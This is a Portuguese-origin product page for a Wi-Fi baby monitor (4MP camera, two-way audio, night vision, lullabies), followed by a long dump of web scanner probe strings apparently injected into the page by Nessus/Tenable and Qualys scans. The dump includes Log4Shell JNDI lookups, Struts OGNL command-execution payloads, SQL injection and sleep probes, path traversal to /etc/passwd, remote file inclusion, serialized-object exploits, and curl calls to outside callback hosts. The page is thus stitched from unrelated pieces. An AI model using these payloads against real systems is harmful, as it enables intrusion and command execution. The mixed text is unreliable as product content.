Meet the Baby Monitor
Anxiety about a baby's safety and well-being during sleep is a common concern among parents. According to a recent survey, 72% of parents report feeling this anxiety, especially because of the lack of continuous monitoring during the night. This anxiety can interrupt parents' sleep, causing tiredness, irritability and even long-term mental health problems (Petite Dreamers) (Parents).

Concern for the baby
Parents often worry about their babies' well-being during the night, fearing that something might happen while they sleep. This worry can result in poor sleep and increased stress, affecting parents' health and energy the following day. Studies show that lack of sleep not only affects mood and decision-making ability, but can also compromise the immune system and increase the risk of depression.

The Baby Monitor CWP41031 was developed to offer parents peace of mind and comfort by allowing continuous, efficient monitoring of the baby during sleep. With 4MP resolution and a clear, richly detailed image, parents can see every detail of the baby's surroundings. In addition, the monitor offers two-way audio, allowing parents to hear and talk to the baby at any time.

Main features and benefits

Real-time monitoring
Over a 2.4GHz Wi-Fi connection, the Baby Monitor lets parents follow the baby's sleep in real time, directly in the app available for iOS and Android.

Smart detection
The monitor detects motion, human presence and crying, as well as room temperature and humidity, and sends immediate notifications to the app whenever any activity is detected.

Two-way audio
With a built-in microphone and speaker, parents can talk to and soothe the baby while they are away.

Infrared night vision
With a range of 10 meters, parents can monitor the baby even in complete darkness.

Dimmable colored light
The baby monitor has an additional light that can be switched on in the desired color and intensity, to offer the baby more comfort.

Flexible storage
Support for a micro SD card of up to 128GB or remote storage, ensuring that all the important moments are recorded.

Smart alarms
Warnings for a full SD card, SD card errors and a power alarm, keeping parents informed about the monitor's status.

Lullabies on the camera
To help the baby rest, the camera has a few lullabies that can be turned on at any time, calming the baby.

With the Baby Monitor, parents can sleep more peacefully knowing that they always have an eye on the baby. The immediate notifications and easy access through the app provide a sense of control and security, significantly reducing anxiety. In addition, the two-way audio function lets parents comfort the baby quickly when they are not with them.

If you are a parent concerned about your baby's sleep and safety, the Baby Monitor is the ideal solution for peaceful nights. Find out more about this incredible device and how it can transform your nights, providing peace of mind and well-being for the whole family.
}
‘tnbwas_bfVpX691vrbh’+1463*3625
nessus_was_textzplweu4b
nessus_was_textrnpksl1g
php://input
nessus_was_textdxj0fvvl
nessus_was_texthym3fp7d
nessus_was_textg6ggtotl
${jndi:ldap://was-log4shell-${date:yyyy}1gdA87SyKEKFamQcZ89W.w.nessus.org}
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
nessus_was_text7h3ouhbs#^($!@$)(()))******
C:/windows/win.ini
${T(java.lang.System).properties}
nessus_was_textidmhrhzl’;.”)
nessus_was_textwgorijp1
nessus_was_text6khmhnui
nessus_was_text2acy4io8
nessus_was_textzu3d2jay
nessus_was_textrph8r2gj
nessus_was_textgxjp83xg
nessus_was_textr9qr5hwo
../../../../../../../../etc/passwd%00.jpg
nessus_was_text0b2a6qolhTtPs://rfi.nessus.org/rfi.txt
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
nessus_was_textqcqr0xby
nessus_was_textqkfnaf6a
nessus_was_textf7rut3sn
nessus_was_texthtal1bc1
file:///etc/passwd
nessus_was_textc54twc79
nessus_was_textvf2ygkb6
nessus_was_text67xlsb3q
nessus_was_text1ai5y72f
nessus_was_text9f30wsk0
nessus_was_textzuchd20t
nessus_was_textkjsjaekj
nessus_was_text5hf86x9h
nessus_was_text92fh89wg”‘`–
gAJjb3MKc3lzdGVtCnEAWEgAAABwaW5nIGV2dmJtaXB2NXR2aXA2b3plZWx3dzNvYW55engzd2pxcXZzeWFwa25ncnhwcHhraGFpdmEud2FzLm5lc3N1cy5vcmdxAYVxAlJxAy4=
nessus_was_textpwrp2x1o
was_lFsUNCPWpTEx
<!DOCTYPE test []>&xxe;
nessus_was_text1fym7cjz'”
Version:|Vendor:
nessus_was_textwg3j45d8
nessus_was_texttnordbp7
wasxsscontext4b7k8z
nessus_was_textrpzj7cfi script:;tenable_wasscan_xss_in_element_event=4d976540-b23d-413b-9a47-98dba5278133//
https://xssrctCwicZws.was.tenable.com
nessus_was_textummkxbtv tenable_wasscan_xss_in_tag=4d976540-b23d-413b-9a47-98dba5278133 blah=
nessus_was_text0g1ix15w
nessus_was_textly3nuguu
abcd
nessus_was_textfx9xuvmn
6339
nessus_was_text0ud4u2b9
nessus_was_texthkl79hf0
-1839
10001839″ or “1839”=”1839
1′ limit 0, 1386 —
1386a
(select (case when (6339=6339) then 1 else (select 1 union select 2) end))– +
nessus_was_textvvj8qj40
10002
-1845
nessus_was_textglxpw93q
sleep 4
nessus_was_texth5by8crd
nessus_was_textlmqp5yy2
nessus_was_text40zbsinz
nessus_was_textyvqjzmaj
sleep(4);
nessus_was_textrvehfutj
nessus_was_text9bnyjhd4 AND (SELECT 7102 FROM (SELECT(SLEEP(2)))AtWCF)
nessus_was_textmkw5qu68
nessus_was_textrjrtxs98
nessus_was_textweu8qwh9
nessus_was_textt1cd7f87
nessus_was_textpzkvydyo
nessus_was_text08pbt0zr
nessus_was_textf19q7xc6
nessus_was_textqq4qbpi3
nessus_was_textgejdip3p
nessus_was_textwvwvrh3s${dns:address|l26ooauhznzf276oxkplqyseq6v4znrr2kb5567oiwlnzayszjiq.was.nessus.org}
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=’echo WAS-$((327*481))’).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘powershell.exe’,’-nop’,’-c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
%{#_memberAccess.allowPrivateAccess=true,#_memberAccess.allowStaticMethodAccess=true,#_memberAccess.excludedClasses=#_memberAccess.acceptProperties,#_memberAccess.excludedPackageNamePatterns=#_memberAccess.acceptProperties,#res=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#a=@java.lang.Runtime@getRuntime(),#s=new java.util.Scanner(#a.exec(‘bash -c {echo,WAS-$((161*188))}’).getInputStream()).useDelimiter(‘\\A’),#str=#s.hasNext()?#s.next():”,#res.print(#str),#res.close()
}
‘tnbwas_OGitvra3YMSY’+6778*5296
nessus_was_textv1x6668a
p “WAS#{65167*76553}”
php://input
was-tnb-bmg
${jndi:ldap://was-log4shell-${date:yyyy}IMDAcTAWtjgR0V4iAfbX.w.nessus.org}
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
nessus_was_text7nmgcwr2#^($!@$)(()))******
C:/windows/win.ini
${T(java.lang.System).properties}
nessus_was_textynqt8pf4′;.”)
abcd
nessus_was_text9xoa86e9
nessus_was_textshw1zhme`id`
nessus_was_text2cbdbn2nnslookup -domain=”was.nessus.org” shwxffro6gshcls2us3tdff7qo7soj7jhetjtjvvzc7f7amspf3q
nessus_was_textvp74mjc2
nessus_was_textgbrhse8w
nessus_was_textjjzsvlce
nessus_was_textlwdgq1x3
nessus_was_text113tddfh
nessus_was_textr93coy5rhTtPs://rfi.nessus.org/rfi.txt
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
nessus_was_textfvehr3t7
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
YToyOntpOjc7TzoyNzoiR3V6emxlSHR0cFxDb29raWVcU2V0Q29va2llIjoxOntzOjMzOiIAR3V6emxlSHR0cFxDb29raWVcU2V0Q29va2llAGRhdGEiO086MzM6IlJlcXVlc3RzX1V0aWxpdHlfRmlsdGVyZWRJdGVyYXRvciI6NDp7aTowO2k6MDtpOjE7YToyOntzOjQ6Ik5hbWUiO3M6Njc6Inl5ZGFteTVhM25ueGV6Nzd4amdnNHp0NnJ0YjRmaXNvZ3Bucmp2eWk3ZGFwYzM0amc0ZHEud2FzLm5lc3N1cy5vcmciO3M6NToiVmFsdWUiO3M6MDoiIjt9aToyO2E6MTp7czoxMToiACoAY2FsbGJhY2siO3M6MTM6ImdldGhvc3RieW5hbWUiO31pOjM7Tjt9fWk6NztpOjc7fQ==
nessus_was_textt2jo242u
file:///etc/passwd
nessus_was_textj2u1ekpu
nessus_was_text8mpgpcqo
@(“tnbwas_vQH7ht0Ok0Jp”+6936*9815)
nessus_was_textqk4qn3ue
nessus_was_text553spjgh
{“tnbwas_vQH7ht0Ok0Jp”}{6936*9815}
nessus_was_textn67k4jn5
nessus_was_textgai4zloa
nessus_was_textu8i02znc”‘`–
nessus_was_textveqotqn2
nessus_was_textg9bxnjpi
nessus_was_textzj6ae5i9
<!DOCTYPE test []>&xxe;
nessus_was_textcix8d1xz'”
Version:|Vendor:
nessus_was_textozbe87py
nessus_was_textbuvg7zws
nessus_was_text7fooewx6 script:;tenable_wasscan_xss_in_element_event=c8d60244-f5bb-40dc-ab6f-9c0b3c79c672//
nessus_was_text39rlw2qz
nessus_was_textky97kkx9 tenable_wasscan_xss_in_tag=c8d60244-f5bb-40dc-ab6f-9c0b3c79c672 blah=
‘ || ‘a’==’a
abcd
nessus_was_textfjklxpje
nessus_was_textog2himod
nessus_was_textnv2qozwf
-1839′ or ‘1839’=’1839
-1839
nessus_was_text36lh974q
1′ limit 0, 1386 —
nessus_was_textn8wcrc8n
(select (case when (6339=6339) then 1 else (select 1 union select 2) end))– +
nessus_was_textb5x8kf4e
10002
nessus_was_textbxmw10r5
-1756
sleep 4
nessus_was_texthzxxmmpe
nessus_was_textk988e412
nessus_was_textrow7d7mu
nessus_was_text2ir3ta86
nessus_was_textk87gl25l
sleep(4);
nessus_was_textjjcj95y4
nessus_was_text566y1eki AND (SELECT 3243 FROM (SELECT(SLEEP(2)))THQMo)
nessus_was_textkxi8qgy9
nessus_was_text0ylp7h6v
nessus_was_textv3hyixkc
nessus_was_textsl6xog4f
nessus_was_textqmb5lm4m
nessus_was_text6kkv2kyo
nessus_was_texto9n3e8i5
nessus_was_textns7ru02z
nessus_was_textekc42agp
nessus_was_textso1nhx04
nessus_was_textndfk1hj3
nessus_was_textbl1y5no1;select pg_sleep(2); — ‘;select pg_sleep(2); — “;select pg_sleep(2); — –
nessus_was_text7447e8ic
nessus_was_text6z1l5e23
nessus_was_text0xlk34jc
https://xssrcFeNXgDIy.was.tenable.com
nessus_was_text65gtd048 tenable_wasscan_xss_in_tag=bdd76bd5-0003-419f-a2a7-5652f4f4d2bd blah=
nessus_was_textn1xpjthq${dns:address|msufeizwam4hhlg6brlummun63qcaxgmnzbr7qjoh3q54yapr4wq.was.nessus.org}
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=’echo WAS-$((696*974))’).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘powershell.exe’,’-nop’,’-c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
‘tnbwas_pEGwBSduAZNS’+3910*7443
{{’tnbwas_pEGwBSduAZNS’+3910*7443}}
nessus_was_textrxq7s856
php://input
was-tnb-vnj
nessus_was_textzm21d28p
nessus_was_textegtoycwx
nessus_was_textcfsqbov7
nessus_was_texttkd63p5o
was-tnb-ukl
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
nessus_was_textlk3b9m97
C:/windows/win.ini
${T(java.lang.System).properties}
nessus_was_textgj27e1yy’;.”)
abcd
type C:\Windows\win.ini
nessus_was_textbognboxu
nessus_was_textw6y1sdkl
||nslookup -domain=”was.nessus.org” gwrbiapsmjmbc75jg6zytpaxrtyc7kww7uvzrkytvmkqh2yjqtza
/../../../../../../../../../../windows/win.ini
nessus_was_texti3lr6jsl
…/./…/./…/./…/./…/./…/./…/./…/./windows/win.ini
nessus_was_textgywg18tc
nessus_was_textv45cmy4s
nessus_was_textnj9rigg5
https://rfi.nessus.org/rfi.txt
file:///etc/passwd
nessus_was_textqv4eea3m
nessus_was_texttu1jgbuj
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
a:2:{i:7%3BO:24:”GuzzleHttp\Psr7\FnStream”:2:{s:33:”%00GuzzleHttp\Psr7\FnStream%00methods”%3Ba:1:{s:5:”close”%3Ba:2:{i:0%3BO:23:”GuzzleHttp\HandlerStack”:3:{s:32:”%00GuzzleHttp\HandlerStack%00handler”%3Bs:11:”tenable.was”%3Bs:30:”%00GuzzleHttp\HandlerStack%00stack”%3Ba:1:{i:0%3Ba:1:{i:0%3Bs:13:”gethostbyname”%3B}}s:31:”%00GuzzleHttp\HandlerStack%00cached”%3Bb:0%3B}i:1%3Bs:7:”resolve”%3B}}s:9:”_fn_close”%3Ba:2:{i:0%3BO:23:”GuzzleHttp\HandlerStack”:3:{s:32:”%00GuzzleHttp\HandlerStack%00handler”%3Bs:11:”tenable.was”%3Bs:30:”%00GuzzleHttp\HandlerStack%00stack”%3Ba:1:{i:0%3Ba:1:{i:0%3Bs:13:”gethostbyname”%3B}}s:31:”%00GuzzleHttp\HandlerStack%00cached”%3Bb:0%3B}i:1%3Bs:7:”resolve”%3B}}i:7%3Bi:7%3B}
nessus_was_text1ssmcsel
nessus_was_texttdjg6k7j
nessus_was_texth8wih7ij
nessus_was_text0f7o74af
nessus_was_textycagi4zc
nessus_was_text5rxpf06y
nessus_was_textjhcg72te
nessus_was_textgvqh77le
nessus_was_textdv196dc3
nessus_was_textx8rzdulp
nessus_was_textp494xno7″‘`–
gAJjb3MKc3lzdGVtCnEAWEgAAABwaW5nIHdvbDVraGF1anJraWtkeWN1NnB2b2V1czc3bWpmcDNha3Frbm9mc2xicWpqcXRxemV1eGEud2FzLm5lc3N1cy5vcmdxAYVxAlJxAy4=
nessus_was_text02ur893r
//mdxtelecom.com.br.bdd76bd5-0003-419f-a2a7-5652f4f4d2bd.com
nessus_was_textfth141jz
nessus_was_textpxywkj59′”
Version:|Vendor:
nessus_was_textvvvcwocq
“/;-window.top._tenable_wasscan_js_namespace_taint_tracer.log_execution_flow_sink()//
wasxsscontext0r6j7n
nessus_was_text8em4jlcv
abcd
nessus_was_text9k7bv8ng
nessus_was_text8wu4lvxf
6339
-1845
nessus_was_text3de91wvg
nessus_was_textqsgo2lyt
-1839 or 1839=1839
-1839
nessus_was_textfl6gyyrx
10001839
1′ limit 0, 1386 —
1386a
nessus_was_text1aiu1p3f
10002’+(select ‘1’,’2′)+’1
nessus_was_textfnrv47bh
nessus_was_textf1k35akg
-1756′ or ‘1756’=’1756′ — +
-1756
nessus_was_text9md52urv
nessus_was_textbtr13ijy
nessus_was_textovnx0wqt
nessus_was_textjl5sreuy
nessus_was_text6al9h3fp
||powershell -nop -c “& {sleep (4 – 1)}”
sleep(4);
nessus_was_textbgmqljow
nessus_was_textk2gginvv AND (SELECT 4704 FROM (SELECT(SLEEP(2)))cZMrW)
nessus_was_texts0g595yj
nessus_was_textoeoz0bxp
nessus_was_textelyu63nh
nessus_was_textevu00v9a
‘=sleep(2)=’
nessus_was_textf6sypmmq
;waitfor delay ‘0:0:2’– “;waitfor delay ‘0:0:2’– “
nessus_was_textg9xt2mex
nessus_was_text7wfkci9b
nessus_was_textixwoenwb
nessus_was_text58xn0cxs
nessus_was_textmvffk9ho
nessus_was_textwe7zrgq7
nessus_was_textwvz0gbn6${dns:address|jdxjqnce4v52pr3xrmuwlm3ucb4kykuhlkbryuetqsoza2pu32nq.was.nessus.org}
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=’echo WAS-$((653*514))’).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘powershell.exe’,’-nop’,’-c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
nessus_was_text6xbwrr1q
‘tnbwas_tj0DpbRjNQVY’+2184*6797
nessus_was_textgilyabpq
p “WAS#{96678*45529}”
php://input
was-tnb-mya
nessus_was_texti47egg6j
nessus_was_text7b04ch3x
nessus_was_textsy8y0tqw
${jndi:ldap://was-log4shell-${date:yyyy}rVdejXr2PpbGjEM5vQzE.w.nessus.org}
nessus_was_textqrpob401
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
nessus_was_textg7llx7d2
C:/windows/win.ini
nessus_was_textsvflmcw3
nessus_was_textu5vpltmx’;.”)
abcd
nessus_was_text096yn67d
nessus_was_textb12dkh7p
nessus_was_texta4npegvw
/../../../../../../../../../../windows/win.ini
nessus_was_texthqleij4h
nessus_was_textxpnc9sht
nessus_was_text8zxnusth
nessus_was_text3urkwlac
https://rfi.nessus.org/rfi.txt
nessus_was_textge0xdvot
nessus_was_texti2oqb199
file:///etc/passwd
netdoc://localhost/etc/passwd
http://2852039166/latest/
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
nessus_was_textvc2g3cxe
nessus_was_text4kti5j9m
nessus_was_text3nq9ib2u
nessus_was_textuac20l41
nessus_was_textcbah7f5f
nessus_was_text4via5qne
nessus_was_text7yp7wpi4
nessus_was_textht24rrvv
nessus_was_textnzvsye9z
{{variable.getClass().forName(‘java.net.InetAddress’).getByName(‘qvuzl3owbj55y4jxlvfok4zp56j7bs7rme2xot7jlwd7upijhoxq’+’.was.nessus.org’)}}
nessus_was_textb3vp3dpf
nessus_was_text2ozvoe24
nessus_was_text9g5opp7h
nessus_was_text2rfl9xyy
nessus_was_textkonkv6zm
nessus_was_textdjiu6uu7
Version:|Vendor:
nessus_was_textsisg7hof
nessus_was_text5ydrtz96
1){window.top._tenable_wasscan_js_namespace_taint_tracer.log_execution_flow_sink()//
window.top._tenable_wasscan_js_namespace_taint_tracer.log_execution_flow_sink()
nessus_was_textuw2w8euq
nessus_was_textlh919dw7 script:;tenable_wasscan_xss_in_element_event=5850a687-5a03-4ec5-9806-f18760dd5dc8//
https://xssrcQctuGZuH.was.tenable.com
nessus_was_textvqxcnvnz
nessus_was_textwftl3u6g
nessus_was_textgnm4bzui
1386a
6339
nessus_was_textegr7g1tz
-1839′ or ‘1839’=’1839
nessus_was_textoxxgqr6q
-1839
10001839′ or ‘1839’=’1839
10001839
1′ limit 0, 1386 —
nessus_was_text8r4cv1ar
nessus_was_text2294pz06
(select (case when (6339=6339) then 1 else (select 1 union select 2) end))– +
10002’+(select ‘1’,’2′)+’1
10002
1 procedure analyse()– +
-1756′ or ‘1756’=’1756′ — +
nessus_was_textboznr65f
-1756
nessus_was_textvbj4j80y
nessus_was_textbjv45qpl
nessus_was_textexb9mceo
nessus_was_textsm6mssby
nessus_was_textzpz3ggpr
sleep(4);
nessus_was_text7xwa5vfp
nessus_was_text01qdw4yu AND (SELECT 8239 FROM (SELECT(SLEEP(2)))GqVtT)
nessus_was_text1qg3gok9
nessus_was_textoxqsrcrm
nessus_was_textkpmnlip1
nessus_was_text6a1kg789
nessus_was_text6x1b0vqy
nessus_was_texti12ccj4q
nessus_was_textrqgoib68
nessus_was_textz0sx6d8t
nessus_was_texth149wren
nessus_was_textlq1wz5ax
nessus_was_textu0fefuaf
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=’echo WAS-$((992*776))’).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘powershell.exe’,’-nop’,’-c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
nessus_was_textxoj5fkwx
nessus_was_textao63lmex
nessus_was_textjryr0bnn
nessus_was_textyjl7f4s3
nessus_was_textsnnrh3m8
was-tnb-eap
nessus_was_textkecrobiw
nessus_was_textbwlkimpr
${jndi:ldap://was-log4shell-${date:yyyy}x2OIGySA3uUdXpcoKKnq.w.nessus.org}
nessus_was_textoal0ofkc
was-tnb-frr
aced0005737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000c770800000010000000017372000c6a6176612e6e65742e55524c962537361afce47203000749000868617368436f6465490004706f72744c0009617574686f726974797400124c6a6176612f6c616e672f537472696e673b4c000466696c6571007e00034c0004686f737471007e00034c000870726f746f636f6c71007e00034c000372656671007e00037870ffffffffffffffff740043766f76746b346a6b333367616b766c636272757169336934686b6c357335706b73776d677161357878636a6170677633637864712e7761732e6e65737375732e6f726774000071007e00057400056874747073707874004b68747470733a2f2f766f76746b346a6b333367616b766c636272757169336934686b6c357335706b73776d677161357878636a6170677633637864712e7761732e6e65737375732e6f726778
nessus_was_text523q7yqe
C:/windows/win.ini
${T(java.lang.System).properties}
nessus_was_textad7pyt10
abcd
nessus_was_text3lbz32ns
nessus_was_textrpp243cc
nessus_was_textk4h423ft
/../../../../../../../../../../windows/win.ini
nessus_was_textsktu8n68
nessus_was_textjl2dxnue
nessus_was_texta8hmazzh
nessus_was_texthlmwtx3c
nessus_was_textt9s3201e
https://rfi.nessus.org/rfi.txt
file:///etc/passwd
nessus_was_textjfiguq8g
nessus_was_textc94afnn3
nessus_was_text9zy92lza
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
nessus_was_textgr7mggtt
nessus_was_textq3jdvru8
nessus_was_textdu0mh4jr
nessus_was_text98ac5yqt
nessus_was_textu51sav7q
nessus_was_textnpv2f61g
nessus_was_textl6j74fw8
nessus_was_textikv1gsty
nessus_was_textm3aysz57
nessus_was_text5685asee”‘`–
gAJjb3MKc3lzdGVtCnEAWEgAAABwaW5nIGJ1enFicWc0ZWlpZzMzaWg2dWplNGo1dXVrdXpqYXBzdXBsbW50NXB0bzRiMmFnY3YzbWEud2FzLm5lc3N1cy5vcmdxAYVxAlJxAy4=
nessus_was_text20ygs26c
https://3e5b1347-ea88-466b-a00a-56ec3e3fa938.com?x=/
nessus_was_texti5viq3ec
nessus_was_textxp62kqe5′”
Version:|Vendor:
nessus_was_textzf2e49pn
nessus_was_text7m4tmbx4
nessus_was_textva54zk41
nessus_was_textsk3npr5q
wasxsscontext1g7h7q
nessus_was_text8bgrf5av script:;tenable_wasscan_xss_in_element_event=3e5b1347-ea88-466b-a00a-56ec3e3fa938//
https://xssrcQFBpttaH.was.tenable.com
nessus_was_textejxr5bfr
abcd
was_xpath_injection
nessus_was_textbd68ddb2
6339
-1756
nessus_was_text6m8vs28q
-1839′ or ‘1839’=’1839
-1839′ or ‘1839’=’1839
-1839
nessus_was_textopzhrkwh
10001839
nessus_was_textwf7q51d0
nessus_was_textvxptd6an
1386a
(select (case when (6339=6339) then 1 else (select 1 union select 2) end))– +
10002’+(select ‘1’,’2′)+’1
nessus_was_textvti6b27v
1 procedure analyse()– +
-1756′ or ‘1756’=’1756′ — +
nessus_was_textcmjvghxk
-1756
nessus_was_textr35izn84
nessus_was_text9zsmtaq5
nessus_was_textlfqti3gd
nessus_was_textqrn4uzky
nessus_was_textkqfcqwp3
nessus_was_textc5jo5x3m
nessus_was_textuyzl9rff||powershell -nop -c “& {sleep (4 – 1)}”
sleep(4);
nessus_was_text0cpfh2y7
nessus_was_textk3k08ydk AND (SELECT 3954 FROM (SELECT(SLEEP(2)))QkQCS)
nessus_was_textf9cf2ico
nessus_was_textukifs97a
nessus_was_text3uvjq7df
nessus_was_texts05etc7y
nessus_was_text8builz5t
nessus_was_text2uscmf9s”=sleep(2)=”
nessus_was_textfo7p56lj
nessus_was_textcxbby0d7
nessus_was_textbp5b8ff0
nessus_was_textlfu6w2z1
nessus_was_textx4wmjgcq
nessus_was_textjq58o1dn
nessus_was_textnzn09k45
1
1
1″‘>
1
1
1
1
,
1
%{(#_=’multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1=’A2B8C3′).(#str2=’q9d4hi5j’).(#str3=’R9D7e8′).(#str=#str2+’:QQ:’+#str1+’:TT:’+#str3).(#cmd=’echo ‘+ #str).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
1
1
1
1
1
1
1
1
${script:javascript:java.lang.Runtime.getRuntime().exec(‘curl http://c64e5a894d55c55a22e4ffe95870050b83fd8a19.3764217161708601.1395765007.oscomm02.oscomm.us4.qualysperiscope.com.’)}
1
1
1
1
$..[?(p=”console.log(this.process.mainModule.require(‘child_process’).execSync(‘curl 0bb8cb7bd2ae3068568a1f20ae0330fd63e03e2f.3764217161708601.3128458544.oscomm15279701.oscomm.us4.qualysperiscope.com.’).toString())”;QualysWAS=”[[‘constructor’]][[‘constructor’]](p);QualysWAS())]
1
1
” onfocus=alert(81) autofocus=true onEvent=X139751729938624Y5_2Z
1
1
1
1
1
1
1
1
1
1
1
nessus_was_textyotish7k tenable_wasscan_xss_in_tag=73fc2a27-216c-4de5-be27-ae14b531769c blah=
nessus_was_textau0c9x3c
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=’echo WAS-$((776*821))’).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘powershell.exe’,’-nop’,’-c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
nessus_was_text84ic2a0i
‘tnbwas_Tt6e5AHVpuNh’+3006*9679
nessus_was_textkuabsv0u
nessus_was_text5cjj81ev
nessus_was_text35qjny5n
nessus_was_textgaldyxcy
php://input
was-tnb-deq
nessus_was_text192emzu0
nessus_was_text6hi52y9t
nessus_was_text0nnm6ibu
nessus_was_text7pgi7wbn
nessus_was_textwdbvjf9l
nessus_was_text5hshl8r7
nessus_was_text851l07oi
aced0005737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000c770800000010000000017372000c6a6176612e6e65742e55524c962537361afce47203000749000868617368436f6465490004706f72744c0009617574686f726974797400124c6a6176612f6c616e672f537472696e673b4c000466696c6571007e00034c0004686f737471007e00034c000870726f746f636f6c71007e00034c000372656671007e00037870ffffffffffffffff7400436e70666678786f326f37733435613632337a736b7a376666676a73696c376c6c7564656f6b666d637735757a7766746b726174612e7761732e6e65737375732e6f726774000071007e00057400056874747073707874004b68747470733a2f2f6e70666678786f326f37733435613632337a736b7a376666676a73696c376c6c7564656f6b666d637735757a7766746b726174612e7761732e6e65737375732e6f726778
nessus_was_text9i8hwe8t
C:/windows/win.ini
${T(java.lang.System).properties}
nessus_was_textzfvoffyv’;.”)
abcd
type C:\Windows\win.ini
nessus_was_textrn8j51tw||type C:\Windows\win.ini
nessus_was_textloms86oa
nessus_was_textiuwi7eid
nessus_was_text7bsxybae
/../../../../../../../../../../windows/win.ini
nessus_was_text109ymdz1
nessus_was_textid879e00
nessus_was_textff2fquax
…\.\…\.\…\.\…\.\…\.\…\.\…\.\…\.\windows\win.ini
.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/etc/passwd
nessus_was_textjz5b5uji
nessus_was_textzu6c6la5
https://rfi.nessus.org/rfi.txt
nessus_was_textu92cvbadrfi.nessus.org/rfi.txt
nessus_was_text38298mi9
nessus_was_text0z0kn78e
nessus_was_textwv9jnd5c
nessus_was_text7mwvw82o
nessus_was_textefqk4x7z
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
nessus_was_text6d4cxfr9
nessus_was_text651tif9q
nessus_was_text5krrfd3m
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
nessus_was_text8u3wqybb
nessus_was_textzyjo7l8x
nessus_was_textlbhumufb
nessus_was_textqfk1dla1
nessus_was_textqpl1rcly
nessus_was_textcjnapsqb
nessus_was_textqhich86v
nessus_was_textxxxz1a2d
}}{{“tnbwas_eit6uMgKCDVB”+str(2435*5696)}}
{{variable.getClass().forName(‘java.net.InetAddress’).getByName(‘mydwljf7jznd6w7mxstrh5tkgzzqu3pc5potqz3ftm4hejjrvdbq’+’.was.nessus.org’)}}
foo.html
nessus_was_texthop18dtp”‘`–
